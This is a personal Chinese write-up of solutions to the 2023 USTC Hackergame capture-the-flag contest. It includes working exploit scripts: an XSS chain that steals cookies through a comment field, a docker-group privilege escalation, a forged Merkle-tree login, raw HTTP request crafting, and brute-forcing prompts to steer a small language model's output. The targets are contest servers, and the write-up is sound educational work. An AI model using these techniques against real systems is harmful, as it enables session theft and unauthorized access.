author	date	license	title
Xzonn	2023-11-04	cc-by-nc-sa 4.0	中国科学技术大学第十届信息安全大赛个人题解

/*!
 * Title: 中国科学技术大学第十届信息安全大赛个人题解
 * Author: Xzonn
 * Date: 2023-11-04
 * License: CC-BY-NC-SA 4.0
 */

大佬太多了，~~不打算多写了~~没忍住，还是写了。写都写了，还是发出来吧。“JSON ⊂ YAML?”（可能）是非预期解。

Web

Hackergame 启动

祖传题，打开页面之后随便录制一下然后提交，查看地址栏：

把“similarity=0”改成“similarity=100”，提交，得到flag。

更深更暗

打开网页，直接Ctrl + A全选复制，然后粘贴到随便一个编辑框得到flag。

赛博井字棋

打开链接发现是下井字棋，但是井字棋没有必胜策略，手动下了好几局都没赢过对方。被GeekGame影响，考虑到这题分类是“web”，猜测是要改Cookie，打开Cookie是类似于jwt的格式，可以Base64解码，但是编辑完之后会报错，应该是做了签名，所以行不通。

一个偶然的机会，我打开控制台，尝试点击对方已有的棋子，发现控制台报错。定位到相关的函数发现：

async function setMove(x, y) {
  if (board[x][y] != 0) {
    return;
  }
  if (frozen) {
    return;
  }
  let url = window.location.href; // 获取当前 URL
  let data = { x: x, y: y }; // 设置要发送的数据
  return fetch(url, {
    method: "POST", // 设置方法为 POST
    headers: {
      "Content-Type": "application/json", // 设置内容类型为 JSON
    },
    body: JSON.stringify(data), // 将数据转换为 JSON 格式
  }).catch(errorHandler);
}

也就是说如果棋盘上的格子已经有棋子了，就不会发送请求。于是直接把第一个return注释掉，然后保存（Chrome的控制台已经这么智能了吗），再点一下，发现对方的棋子被我覆盖了？好家伙，这样就直接能连成一条线了，得到flag。

组委会模拟器

点进去之后打开控制台，发现所有的消息都是一开始就已经获取的，只不过需要按照一定的延时显示出来，而每点击一次消息模拟撤回就会发送一条请求。懒得拿Python写了，直接上UserScript：

// ==UserScript==
// @name         New Userscript
// @namespace    http://tampermonkey.net/
// @version      0.1
// @description  try to take over the world!
// @author       You
// @match        http://202.38.93.111:10021/
// @grant        none
// @require      https://code.jquery.com/jquery-3.7.1.min.js
// ==/UserScript==

(function() {
  setInterval(
    () =>
      $(".fakeqq-message__bubble span").each((a, b) => {
        if (b.innerText.match(/hack\[[a-z]+\]/)) {
          $(b).click();
        }
      }),
    100
  );
})();

等消息跑完得到flag。

HTTP 集邮册

Flag 1&Flag 3

这题很有意思，分别需要收集5种和12种HTTP状态码。虽然HTTP状态码很多，但是想要从一个默认配置的nginx服务器里面搞到这么多状态码就不是很容易了。收集完成后得到flag 1和flag 3。

100 Continue

查找417的资料时发现的，添加“Expect: 100-continue”一行：

POST / HTTP/1.1\r\n
Expect: 100-continue\r\n
Host: example.com\r\n\r\n

200 OK

最简单的状态码，只需要发送默认请求即可：

GET / HTTP/1.1\r\n
Host: example.com\r\n\r\n

206 Partial Content

需要加“Range”头：

GET / HTTP/1.1\r\n
Range: bytes=100-200\r\n
Host: example.com\r\n\r\n

304 Not Modified

和缓存有关，从上面的200结果得到ETag和最后修改时间，然后放到请求里：

GET / HTTP/1.1\r\n
If-Modified-Since: Tue, 15 Aug 2023 17:03:04 GMT\r\n
If-None-Match: "64dbafc8-267"\r\n
Host: example.com\r\n\r\n

400 Bad Request

不发送Host即可：

GET / HTTP/1.1\r\n\r\n

404 Not Found

比较简单，请求一个不存在的地址即可：

GET /1 HTTP/1.1\r\n
Host: example.com\r\n\r\n

405 Not Allowed

把GET改成POST即可：

POST / HTTP/1.1\r\n
Host: example.com\r\n\r\n

412 Precondition Failed

和304反过来，要写“If-Match”：

GET / HTTP/1.1\r\n
If-Match: W/"64dbafc8-267"\r\n
Host: example.com\r\n\r\n

414 Request-URI Too Large

把请求路径写得非常长即可，如果还不够长，复制粘贴几次：

GET /abcdefghijklmnopqrstuvwxyz...abcdefghijklmnopqrstuvwxyz HTTP/1.1\r\n
Host: example.com\r\n\r\n

同样想到可以尝试“413 Content Too Large”，但是尝试了一下不太行，请求体太长的话题目网站自己也会炸。同样尝试“431 Request Header Fields Too Large”，发现会返回400而不是431。

416 Requested Range Not Satisfiable

类似于206，但是Range的范围需要改得离谱一点：

GET / HTTP/1.1\r\n
Range: bytes=100000000-200\r\n
Host: example.com\r\n\r\n

501 Not Implemented

随便试出来的，一开始甚至忘了怎么搞出来的了，等看了官方题解才知道。

GET / HTTP/1.1\r\n
Transfer-Encoding: x\r\n
Host: example.com\r\n\r\n

505 HTTP Version Not Supported

把HTTP版本改成不存在的10.0即可：

GET / HTTP/10.1\r\n
Host: example.com\r\n\r\n

413 Content Too Large

（赛后交流补记）

原来可以用Content-Length伪造长度：

GET / HTTP/1.1\r\n
Content-Length: 999999999999\r\n
Host: example.com\r\n\r\n

我本来是想手动往里塞东西的，但是把网站搞炸了。不过瞎猫碰死耗子搞出来了501，凑巧也过了。

Flag 2

谷歌搜索如何才能让HTTP请求不返回状态码，但是答案都告诉我正常的请求一定会返回状态码。不过我找到了这篇文档，里面提到了老旧的HTTP/0.9协议是单行的，于是可以构造请求：

GET /\r\n\r\n

得到的响应也是符合HTTP/0.9的响应，没有状态码，得到flag 2。

微积分计算小练习 2.0

（赛后交流补记）

成绩结算页面很简陋，猜测有XSS的机会，随便输入个“123”进去，再一看源代码：

updateElement("#score", "你的得分是 <b>0</b> 分");
updateElement("#comment", "你留下的评论：123");

分数不重要，但是评论的字符串是直接拼接进去的，这里可以想办法修改。

看题目提示可以想到是用window.open()打开一个弹出窗口，顺带找到了2021年GeekGame“Q小树洞的一大步”的题解，但是这题环境里没有外网，即使报错也没法输出，所以我的思路卡死在这里了。看了官方题解才想到，成绩结算页面是有用的啊，我构造一个网页，让它把数据从评论的接口给我发出来就行了。

首先先写JavaScript让它把Cookie读出来发到评论里，因为flag可能有特殊字符，需要用Base64编码一下，而且“flag”可能会有点长，还需要截断：

document.getElementsByTagName("textarea")[0].value = btoa(document.cookie).substring(0, 25); document.getElementsByTagName("form")[0].submit();

写完之后得想办法在成绩结算页面运行，因为有长度限制，所以直接写在评论里不现实。如何才能运行一段自定义的JavaScript？结合前面提示的弹出窗口，它所有的参数是这样的：

open(url, target, windowFeatures)

这个target是新开的窗口的名字（window.name），所以可以把payload代码扔到这里，然后构造字符串让它运行：

"+[location=name]+"

可以直接通过给location赋值来跳转页面我确实是第一次知道，如果写location.href过不了检测，location["href"]太长了。写个脚本：

import base64
import re
import requests
import urllib.parse

from pwn import *

token = "<MY TOKEN>"

context(log_level = "error")

session = requests.Session()
session.get(f"http://202.38.93.111:10051/?token={urlencode(token)}")
b64str = ""
start = 0
while True:
  session.post("http://202.38.93.111:10051/result", {
    "comment": '"+[location=name]+"'
  })
  conn = connect("202.38.93.111", 10053)
  conn.sendlineafter(b"token: ", token.encode())
  conn.sendlineafter("文件。".encode("utf8"), f"""<script>open("http://web/result", `javascript:document.getElementsByTagName("textarea")[0].value = btoa(document.cookie.split("flag=")[1]).substring({start}, {start + 24}); document.getElementsByTagName("form")[0].submit();`);</script>\nEOF""".encode())
  conn.recvuntil(b"Bye bye!")
  conn.close()
  response = session.get("http://202.38.93.111:10051/result")
  s = re.search(r"你留下的评论：([^\"]+)", response.text).group(1)
  if s == "（还没有评论）":
    break
  print(s, end="")
  b64str += s
  start += 24

print("\n" + urllib.parse.unquote_plus(base64.b64decode(b64str).decode()))

至此，Web题就算都做出来了！（虽然是赛后才做出来的）

General

猫咪小测

1. 想要借阅世界图书出版公司出版的《A Classical Introduction To Modern Number Theory 2nd ed.》，应当前往中国科学技术大学西区图书馆的哪一层？（30 分）

先从中国科学技术大学图书馆网站查找馆藏，发现位于“西区外文书库”，继续找到“西区图书馆简介”，外文书库位于12楼。答案是12。

2. 今年 arXiv 网站的天体物理版块上有人发表了一篇关于「可观测宇宙中的鸡的密度上限」的论文，请问论文中作者计算出的鸡密度函数的上限为 10 的多少次方每立方秒差距？（30 分）

机翻，得到英语“The Upper Limit of Chicken Density in the Observable Universe”，谷歌搜索发现论文，摘要里有“We find the most restrictive upper limit from the domains considered to be 10²³ pc⁻³...”，答案是23。

3. 为了支持 TCP BBR 拥塞控制算法，在编译 Linux 内核时应该配置好哪一条内核选项？（20 分）

继续机翻，得到英语“TCP BBR congestion control algorithm Linux compile”，谷歌搜索发现这篇文章，页面里面有“CONFIG_”开头的字符，答案是CONFIG_TCP_CONG_BBR。

4. 🥒🥒🥒：「我……从没觉得写类型标注有意思过」。在一篇论文中，作者给出了能够让 Python 的类型检查器 MyPY mypy 陷入死循环的代码，并证明 Python 的类型检查和停机问题一样困难。请问这篇论文发表在今年的哪个学术会议上？（20 分）

接着机翻，得到英语“mypy infinite loop”，谷歌搜索发现一篇2023年的论文，里面有一行“ECOOP 2023”，应该就是会议名称，答案是ECOOP。

旅行照片 3.0

题目1

从中午的第一张图片看到学长的吊牌上写着“STATPHYS28”，谷歌搜索发现官网，日期是2023年8月7日到11日，具体哪天我不确定，但是下面题目2的答案是确定的，一天一天地尝试，答案是2023-08-10。

题目2

上午的图片可以看出来是个奖牌，“MMII”是罗马数字2002，搜索“M Koshiba 2002”发现是诺贝尔奖得主小柴昌俊，他所在的单位是东京大学，所以搜索“ノーベル賞メダル東京大学”，进入这个页面，里面是东大科学博物馆展示的3个奖牌，并且附上了得主的出生年份。最年轻的是1959年出生的梶田隆章，他在2015年得奖，所在单位是“东京大学宇宙射线研究所”，点进去这个页面，右上角就有缩写，答案是ICRR。

题目3

直接对中午的第二张图片用谷歌搜图，发现这个页面的介绍，这里应该是上野公园。查了一下谷歌地图，上野公园位于东大附近，正好和前面的活动对得上。搜一下“上野公園イベント”，查到2023年的活动，其中8月10日-13日举办的是“全国梅酒まつりin東京”。跳到官网发现有一则志愿者招募通知，问卷链接格式正好一样，答案是S495584522。

题目4

知道了喷泉在上野公园，那么博物馆应该就是旁边的日本国立科学博物馆，直接看购票指南，里面提到一般大学生票价630日元，但是合作学校的学生免费，查到合作学校名单里包含东京大学，所以费用是0。

题目5

按照题目1的答案，回去找“STATPHYS28”会议在8月10日的活动安排，发现晚上有个宴会，会面地点是“Yasuda Auditorium”，换成简体中文就是答案安田讲堂。（我感觉预期解应该是先看每天的活动安排，找到坐船的这天，然后回答题目1。）

题目6

谷歌搜索“ボタン＆カフリンクス上野駅”发现这个页面，找到8月3日-13日的活动，正好是粉色的海报，照片上是熊猫。

第二个广告牌我在上野站附近找了好久，一直没找到，但是我之前看新闻有印象说涩谷附近有3D广告牌，查到这篇介绍说是秋田犬，填进去对了。后来才发现题目说是“出站口附近”，而“我”下车的地点应该是Nintendo TOKYO所在的涩谷站，怪不得。

奶奶的睡前 flag 故事

一开始还以为是图片隐写，但是找了几个工具都没有得到什么有效信息。后来我重新读了一下题目说明，发现加粗了几个地方：“谷歌『亲儿子』”“连系统都没心思升级”“截图”，谷歌亲儿子应该是指Google Pixel系列手机，谷歌一下“Google Pixel 漏洞”，果然找到了名为“aCropalypse”的漏洞（CVE 2023-21036），同时找到了一个能恢复图片的网站。要恢复图片需要手机分辨率，根据题目提供的图片大小“1080x1068”猜测应该是标准的1080x1920大小，提交上去得到恢复的图片。

虫

（赛后交流补记）

看到这么多人完成，但我毫无头绪。本来以为是音频隐写，但是用了很多软件都没有结果。

回去看题干，问了ChatGPT“通过无线信道传输图片的方式包含哪些”，它也没给我什么有用的答案。但我其实应该把后面那句话也加上的：

实际上谷歌“无线接收国际空间站的图片”能够搜到这篇文章，如果我当时好好搜索一下应该也能找到，这个通讯方式叫“SSTV”（慢扫描电视）。

知道了解码方式，后面的做法就很简单了，有个Python的包可以直接把.wav文件转成.png图片，安装一下然后使用，完事。

JSON ⊂ YAML?

Flag 1

题目提示里提到了YAML 1.1和1.2的区别，于是找到了官方文档，里面提到：

大意就是，这几个字符会被YAML 1.1当成是换行符。

所以想到发送含有这几个字符的内容，因为终端手动输入不好输入，于是拿Python写：

from pwn import *

conn = connect("202.38.93.111", 10096)
conn.sendlineafter(b"Please input your token:", b"<MY TOKEN>")
conn.sendlineafter(b"Input your JSON:", '["\u0085\u2028\u2029"]'.encode("utf8"))
print(conn.recvall().decode("utf8"))
conn.close()

解码的结果：

As JSON: ['\x85\u2028\u2029']
As YAML 1.1: ['\u2028\u2029']

可以看到\x85在YAML 1.1里面消失了。得到flag 1。

Flag 2

要获得flag 2首先得满足json和pyyaml解析不报错，否则会直接返回错误信息。

官方文档里提示的其他地方我都尝试构造了，但没有得到能用的结果。我继续查找资料的时候发现了“YAML Test Matrix”，里面是一些测试用例，点进去之后对比“native”一列的“py pyyaml”和“py ruamel”，发现了一个测试用例#2JQS：

: a
: b

直接本地解析这个测试用例，无论是pyyaml还是ruamel都会报错。但是测试用例的标签里有个“duplicate-key”，想到可以尝试构建一个含有重复键的请求，于是构造了这样的请求：

{"a": 1, "a": 2}

果然，json和pyyaml解析成功，ruamel解析失败，提交上去得到flag 2。

Git? Git!

谷歌搜索“Git 查看撤销的提交”，发现可以用git reflog命令查看曾经的commit记录，然后用git reset --hard <commit>恢复到某个commit，于是得到flag。

Docker for Everyone

谷歌搜索“docker 提权”，发现了一篇文章，里面提到拥有docker用户组权限的用户可以借助docker提权。因为题目环境本身应该也是个docker，所以这个题是要在docker里跑docker？（禁止套娃）

先在根目录下运行ls -l，发现flag的指向：

lrwxrwxrwx    1 root     root            13 Oct  8 12:10 flag -> /dev/shm/flag

运行docker images，发现只有一个alpine镜像（其实在启动界面也有提示），于是运行：

docker run -it --rm -v /dev/shm:/dev/shm alpine /bin/cat /dev/shm/flag

得到flag。

🪐 高频率星球

下载文件，拿VS Code打开，可以看出来是一个多行的文本文件，除了第一行外，后面的每行都是一个json格式的数组。拿Python写个脚本将其转换成文本并保存，然后手动删除控制符，本地运行一次即可得到flag。

🪐 流式星球

按照题目给出的脚本，先本地找一个mp4文件跑一下，可以发现输出的二进制文件就是每个像素的RGB值。那么可以想到直接读取二进制文件的数据，然后按照RGB的顺序写入图片即可。但是前提是需要知道视频的宽和高，根据题目给出的脚本，可以知道最后输出的二进制文件大小是width * height * frame_count * 3，所以可以通过分解质因数，找到可能得图片宽度。题目给出的二进制文件大小是135146688，并且故意截掉了最后的0-100位，所以只需要在135146688-135146788范围内分解因数：

from functools import reduce

def factors(n) -> set:
  try:
    # Source: https://stackoverflow.com/questions/6800193/what-is-the-most-efficient-way-of-finding-all-the-factors-of-a-number-in-python
    # Author: agf
    return set(reduce(list.__add__, ([i, n // i] for i in range(2, int(n ** 0.5) + 1) if n % i == 0)))
  except:
    return set()

all_factors = set()
for i in range(0, 101):
  if i % 3 != 0:
    continue
  temp = factors((135146688 + i) // 3)
  if len(temp) < 3:
    continue
  all_factors |= temp

print(sorted(all_factors))

将所有的因数作为图片的宽，然后读取4096行数据，并将读取的数据保存为图片：

import math
import struct
from PIL import Image

with open("video.bin", "rb") as reader:
  data = reader.read()

factors = [2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 44, 45, 46, 48, 50, 51, 52, 54, 55, 56, 57, 59, 60, 61, 63, 64, 65, 67, 68, 69, 70, 74, 75, 76, 77, 78, 82, 83, 91, 92, 93, 95, 100, 101, 102, 103, 107, 111, 113, 114, 121, 126, 130, 134, 136, 139, 140, 150, 156, 161, 166, 167, 171, 181, 183, 184, 189, 193, 195, 201, 204, 206, 209, 211, 214, 222, 223, 228, 231, 233, 241, 253, 259, 260, 268, 272, 280, 300, 325, 333, 334, 342, 347, 349, 378, 386, 390, 402, 408, 409, 412, 417, 422, 427, 461, 483, 501, 518, 543, 603, 605, 650, 666, 671, 684, 694, 698, 759, 777, 780, 804, 816, 818, 824, 922, 973, 975, 983, 999, 1002, 1045, 1205, 1206, 1273, 1281, 1300, 1388, 1391, 1396, 1403, 1529, 1554, 1561, 1636, 1711, 1717, 1721, 1745, 1771, 1844, 1950, 1966, 1998, 2013, 2299, 2305, 2331, 2369, 2377, 2412, 2443, 2546, 2776, 2782, 2792, 2919, 2949, 3197, 3221, 3227, 3272, 3277, 3403, 3442, 3490, 3688, 3819, 3900, 3919, 3932, 4057, 4209, 4587, 4610, 4662, 4697, 4738, 4754, 4886, 5092, 5313, 5552, 5898, 6025, 6442, 6454, 6544, 6619, 6667, 6757, 6806, 6884, 6980, 6993, 7477, 7638, 8114, 8479, 8847, 9220, 9476, 9508, 9591, 9663, 9772, 9821, 10703, 11104, 11457, 11495, 11551, 11796, 12215, 12908, 13088, 13238, 13747, 13768, 13960, 13986, 14091, 15276, 15433, 16135, 16193, 16228, 17694, 18440, 18677, 18952, 19016, 19326, 19544, 19595, 22379, 22547, 22914, 23102, 24430, 25437, 25816, 26176, 26237, 26329, 27536, 28859, 28989, 29463, 32109, 32270, 32386, 32456, 34653, 35167, 35388, 37354, 37385, 43109, 44959, 45094, 45828, 46204, 46299, 48860, 54671, 55072, 55207, 56031, 57755, 57978, 59353, 64540, 64912, 65861, 67137, 67641, 69306, 74461, 74708, 82963, 86967, 89918, 93269, 97720, 105501, 106751, 108031, 109342, 110144, 110414, 112062, 115510, 116707, 119177, 129080, 129824, 131722, 134877, 135282, 138612, 150163, 160889, 165621, 168093, 173265, 173934, 178059, 186925, 193343, 195017, 197583, 202013, 202923, 210509, 213502, 215545, 218684, 220828, 224124, 231020, 233414, 238354, 244831, 246169, 248889, 263444, 269754, 271379, 279807, 288775, 300326, 321778, 324093, 331242, 336186, 346530, 357531, 372305, 395166, 398663, 405846, 421018, 437368, 441656, 446029, 450489, 474199, 484397, 489662, 495043, 542758, 549377, 577550, 585051, 592749, 600652, 608769, 643556, 652883, 662484, 672372, 693060, 703889, 715062, 738507, 750815, 763541, 790332, 804445, 819071, 834239, 866325, 883312, 900978, 938519, 979324, 1001087, 1023839, 1072593, 1098754, 1126223, 1155100, 1185498, 1217538, 1251359, 1287112, 1324968, 1365119, 1407778, 1407779, 1453191, 1501630, 1553411, 1608890, 1668478, 1732650, 1732651, 1801956, 1801957, 1877038, 1958648, 1958649, 2047678, 2145186, 2145187, 2252445, 2252446, 2370995, 2370996, 2502717, 2502718, 2649936, 2649937, 2815556, 2815557, 2815558, 3003260, 3003261, 3217779, 3217780, 3465300, 3465301, 3465302, 3754075, 3754076, 3754077, 4095355, 4095356, 4095357, 4504890, 4504891, 4504892, 5005433, 5005434, 5005435, 5005436, 5631112, 5631113, 5631114, 5631115, 5631116, 6435557, 6435558, 6435559, 6435560, 6435561, 7508150, 7508151, 7508152, 7508153, 7508154, 9009780, 9009781, 9009782, 9009783, 9009784, 9009785, 11262224, 11262225, 11262226, 11262227, 11262228, 11262229, 11262230, 11262231, 11262232, 15016299, 15016300, 15016302, 15016303, 15016304, 15016305, 15016306, 15016307, 15016308, 15016309, 22524448, 22524450, 22524451, 22524452, 22524453, 22524454, 22524455, 22524456, 22524457, 22524458, 22524459, 22524460, 22524461, 22524462, 22524463, 22524464]

for width in factors:
  height = math.ceil(len(data) / (width * 3))
  if width > 4096 or width % 10 == 0:
    continue
  if height > 4096:
    height = 4096
  image = Image.new("RGB", (width, height))
  for y in range(height):
    for x in range(width):
      try:
        r, g, b = struct.unpack("<3B", data[(y * width + x) * 3 : (y * width + x + 1) * 3])
        image.putpixel((x, y), (r, g, b))
      except:
        break

  image.save(f"output/{width}.png")

查看输出结果，可以看到宽度为427时恰好是可读的（竟然还是BanG Dream!相关的图），拿PhotoShop可以看出来图片的高是759，所以改一下上面的代码把每一帧保存出来就能看到flag了。

🪐 低带宽星球

提到压缩图片，首先想到WebP，直接拿Python写个代码：

from PIL import Image

image = Image.open("image.png")
image.save("image.webp", lossless=True, quality=100, method=6)

顺带一提有损压缩比无损压缩得到的图片竟然要大一些，离谱。这种方法得到的图片大小是172字节，可以得到flag 1。

关于如何继续压缩，我有两个思路，一个是更换格式，另一个是手动尝试编码WebP。

拿PhotoShop打开图片发现只有三种颜色的矩形，于是我能想到的最好的办法就是自创一种格式，只保存图片大小、矩形位置、矩形大小、填充颜色……但是这个方法可能不太现实。想到用svg实现：

<svg width="1024" height="1024"><rect width="1024" height="1024" fill="#0ef3da"/><rect width="662" height="1024" fill="#5e9ea9"/><rect width="398" height="1024" fill="#7d3448"/></svg>

然后用gzip命令压缩，保存成svgz文件，大小是103字节，确实也能被评判程序识别，但是大小还是没有达到50字节及以下。

Komm, süsser Flagge

Flag 1&Flag 2

（赛后交流补记）

结合“HTTP 集邮册”这个题，可以猜到是要手动发送HTTP请求。但是我基础知识学得确实不好，不知道还能分段发送的：

import socket
import time

token = "<MY TOKEN>"

with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as client_socket:
  client_socket.connect(("202.38.93.111", 18081))
  client_socket.send(b"P")
  time.sleep(1)
  client_socket.send(f"OST / HTTP/1.1\r\nHost: 202.38.93.111\r\nContent-Length: {len(token)}\r\n\r\n{token}".encode())
  response = client_socket.recv(1024)
  print(response.decode())

Math

惜字如金 2.0

感觉这题好像比去年的题简单，不过去年我没参加，只看了题解。

查看给出的源代码发现部分字符串被简化了，cod_dict的每个元素被简化后都只剩下23位，但check_equals要求24位。于是根据逻辑手写一个Python代码：

id_list = [53, 41, 85, 109, 75, 1, 33, 48, 77, 90, 17, 118, 36, 25, 13, 89, 90, 3, 63, 25, 31, 77, 27, 60, 3, 118, 24, 62, 54, 61, 25, 63, 77, 36, 5, 32, 60, 67, 113, 28]

cod_dict = ['nymeh1niwemflcir}echaet', 'a3g7}kidgojernoetlsup?h', 'ulw!f5soadrhwnrsnstnoeq', 'ct{l-findiehaai{oveatas', 'ty9kxborszstguyd?!blm-p']

x = ""
for id in id_list:
  a = id // 24
  b = id % 24
  print(f"{a:>2d} {b:>2d} {cod_dict[a][b]}")
  x += cod_dict[a][b]

print(x)

显然输出结果应该以flag{为开始，以}为结尾。因为23和24只差一位，所以手动尝试修改cod_dict插入一位即可。我修改后的结果：

cod_dict = ['nymeh1niwemflcir}echaet', 'a3g7}kidgojernoetlsup?h', 'ullw!f5soadrhwnrsnstnoeq', 'cct{l-findiehaai{oveatas', 'tty9kxborszstguyd?!blm-p']

重新运行即可得到flag，并没有其他套路。

O(1) 用户登录系统

（赛后交流补记）

这个题其实我有大致思路，不过没有深入考虑怎么构造，等到看到官方题解之后又整理了一下思路，发现没那么难。

从题目给的源代码的变量名可以知道这是一种“Merkle树”，其大致思想就是先把数据放到最底部的叶节点求hash，而父节点的hash是两个叶节点的数据拼合后求hash，最后算出来根节点。

模拟一下这个过程，假设提供了4个用户，其用户名和密码组合是A、B、C、D，那么每个节点的数据是：

buffer[7]	buffer[6]	buffer[5]	buffer[4]	buffer[3]	buffer[2]	buffer[1]
hash(D)	hash(C)	hash(B)	hash(A)	hash(6, 7)	hash(4, 5)	hash(2, 3)

现在假设A就是admin的数据，那么根据源代码，可以计算出登录凭据是buffer[5] + buffer[3]。在验证时，可以计算出buffer[4] = hash(A)，buffer[2] = hash(4, 5)，buffer[1] = hash(2, 3)。如果计算出的buffer[1]和保存的merkle_root一致，就算做是登录成功。显然，直接输入admin:(密码)的数据会被拒绝，因此要想办法构造一个假的数据，让它能够生成和带有admin:(密码)相同的merkle_root。

为了简化计算方法，考虑只有2个用户的情况，假设其用户名和密码组合是X、Y，那么每个节点的数据是：

another_buffer[3]	another_buffer[2]	another_buffer[1]
hash(Y)	hash(X)	hash(2, 3)

如果我直接让another_buffer[3] == buffer[3]、another_buffer[2] == buffer[2]，问题就迎刃而解了。sha1碰撞计算量太大，不现实，所以考虑直接让X就等于排序后的buffer[4] + buffer[5]，Y就等于B。因为验证的时候并不会验证buffer[5]是不是真的是个hash值，所以buffer[5]可以选择任何长度为20的字符串；而Y和B只要满足username:password的格式即可。接下来只需要想办法让admin:(密码)的sha1里面没有换行符且没有:、并且全部是UTF-8可以解码的字符，buffer[5]里有且仅有一个:、其他为任意字符，然后计算凭据即可。第一个需要手动遍历：

from hashlib import sha1

start = 0
while True:
  admin_str = f"admin:{start}"
  result = sha1(admin_str.encode()).digest()
  try:
    assert b"\n" not in result
    assert b":" not in result
    result.decode()
  except:
    start += 1
    continue
  print(admin_str)
  print(result.decode())
  break

很容易算出来admin:32740满足要求，虽然计算出来的hash值里面有一些控制符，不过既然都用Python了，这都不是个事。接下来按照上面的思路计算所需的每个数据，然后直接发送出去：

from hashlib import sha1
from pwn import *

token = "<MY TOKEN>"

context(log_level = "error")

admin_str = "admin:32740"

buffer_4 = sha1(admin_str.encode()).digest()
buffer_5 = b":" + b"a" * 19

X = b"".join(sorted((buffer_4, buffer_5)))
Y = b"B:B"
buffer_3 = sha1(Y).digest()

credential = buffer_5 + buffer_3

conn = connect("202.38.93.111", 10094)
conn.sendlineafter(b"token", token.encode())
conn.sendlineafter(b"Choice: ", b"1")
conn.sendlineafter(b"> ", X)
conn.sendlineafter(b"> ", Y)
conn.sendlineafter(b"> ", b"EOF")
conn.sendlineafter(b"Choice: ", b"2")
conn.sendlineafter(b"Login credential: ", (admin_str + ":" + credential.hex()).encode())
conn.recvuntil(b"Hello, admin!\n")
print(conn.recvline().decode())
conn.close()

官方题解其实额外增加了计算量。第一是官方题解构造了另一个字符串pass2计算sha1得到了h4（即我的buffer[5]），实际上可以指定h4，然后发送的时候将h3和h4排序。第二是不需要保证h2 > sha1(h3 + h4).digest()，因为这两个hash在构建Merkle树和比对Credential的时候都会比较大小。

AI

🪐 小型大语言模型星球

Flag 1

输入I'm smart, he is smart, she is smart, they are smart, and you,得到回复：

and you are smart. I love you, Lily, I love you, you love me."

Lily and her mom and dad and the

可以得到flag 1。

Flag 2

（赛后交流补记）

这题我没仔细看源代码，本来以为是让模型输出的字符不超过7个字，赛后看完题解才发现原来是要输入的消息长度不超过7个字。其实正确做法应该是本地搭个模型然后遍历，核心代码只需要把predict()的函数抄下来就完了：

from transformers import AutoModelForCausalLM, AutoTokenizer

model = AutoModelForCausalLM.from_pretrained("./TinyStories-33M").eval()
tokenizer = AutoTokenizer.from_pretrained("./TinyStories-33M")

def predict(message) -> str:
    model_inputs = tokenizer.encode(message, return_tensors="pt")
    model_outputs = model.generate(
        model_inputs,
        max_new_tokens=30,
        num_beams=1,
        pad_token_id=tokenizer.eos_token_id,
    )
    model_outputs = model_outputs[0, len(model_inputs[0]) :]
    model_output_text = tokenizer.decode(model_outputs, skip_special_tokens=True)
    return model_output_text

a = 32
while True:
    input = f"{chr(a)}accept"
    output = predict(input).replace("\n", "")
    print(f"{input}: {output}")
    if "accepted" in output.lower():
        break
    a += 1

跑出来发现Faccept满足要求，输出是：

was a good friend who accepted her help. She was happy to have a friend who accepted her help.

后两个flag好像涉及模型训练，没学过，跳过了。

Binary

为什么要打开 /flag 😡

Flag 1

查看源代码，可以看出来libc的几个函数被改成了自定义的函数。不过没关系，咱不是还能搞系统调用嘛。直接写汇编：

section .data
  filename db '/flag', 0
  buffer_size equ 1024

section .bss
  fd resq 1
  buffer resb buffer_size

section .text
  global _start

_start:
  ; Open the file
  mov rdi, filename
  mov rsi, 0     ; O_RDONLY mode
  mov rax, 2     ; syscall number for sys_open
  syscall
  mov [fd], rax  ; Store the file descriptor

  ; Read from the file
  mov rdi, [fd]
  mov rsi, buffer
  mov rdx, buffer_size
  mov rax, 0     ; syscall number for sys_read
  syscall

  ; Write to stdout
  mov rdi, 1     ; file descriptor 1 (stdout)
  mov rsi, buffer
  mov rdx, rax   ; number of bytes read
  mov rax, 1     ; syscall number for sys_write
  syscall

  ; Close the file
  mov rdi, [fd]
  mov rax, 3     ; syscall number for sys_close
  syscall

  ; Exit
  mov rax, 60    ; syscall number for sys_exit
  xor rdi, rdi   ; exit code 0
  syscall

编译：

nasm -f elf64 flag.asm -o flag.o
ld -m elf_x86_64 flag.o -o executable

上传上去得到flag 1。

后记

对我来说这是第三次正式参加这种比赛，虽然跟我本人专业也不太相关，但是就是觉得很有意思。比赛的题目都挺有意思的，是我自己太菜了，二进制和算法题都不太熟练，不过这次比赛中我也是边做题边学习，了解了很多知识，希望对之后的学习、生活、科研甚至是以后找工作都有帮助吧。

~~不对，我不是想说这些，我是想说，如果我有时间的话，说不定能再多拿1250分……~~当然，马后炮没啥用，还是得好好学习才行。

Files

README.md

Latest commit

History

README.md

File metadata and controls

Web

Hackergame 启动

更深更暗

赛博井字棋

组委会模拟器

HTTP 集邮册

Flag 1&Flag 3

100 Continue

200 OK

206 Partial Content

304 Not Modified

400 Bad Request

404 Not Found

405 Not Allowed

412 Precondition Failed

414 Request-URI Too Large

416 Requested Range Not Satisfiable

501 Not Implemented

505 HTTP Version Not Supported

413 Content Too Large

Flag 2

微积分计算小练习 2.0

General

猫咪小测

1. 想要借阅世界图书出版公司出版的《A Classical Introduction To Modern Number Theory 2nd ed.》，应当前往中国科学技术大学西区图书馆的哪一层？（30 分）

2. 今年 arXiv 网站的天体物理版块上有人发表了一篇关于「可观测宇宙中的鸡的密度上限」的论文，请问论文中作者计算出的鸡密度函数的上限为 10 的多少次方每立方秒差距？（30 分）

3. 为了支持 TCP BBR 拥塞控制算法，在编译 Linux 内核时应该配置好哪一条内核选项？（20 分）

旅行照片 3.0

题目1

题目2

题目3

题目4

题目5

题目6

奶奶的睡前 flag 故事

虫

JSON ⊂ YAML?

Flag 1

Flag 2

Git? Git!

Docker for Everyone

🪐 高频率星球

🪐 流式星球

🪐 低带宽星球

Komm, süsser Flagge

Flag 1&Flag 2

Math

惜字如金 2.0

O(1) 用户登录系统

AI

🪐 小型大语言模型星球

Flag 1

Flag 2

Binary

为什么要打开 /flag 😡

Flag 1

后记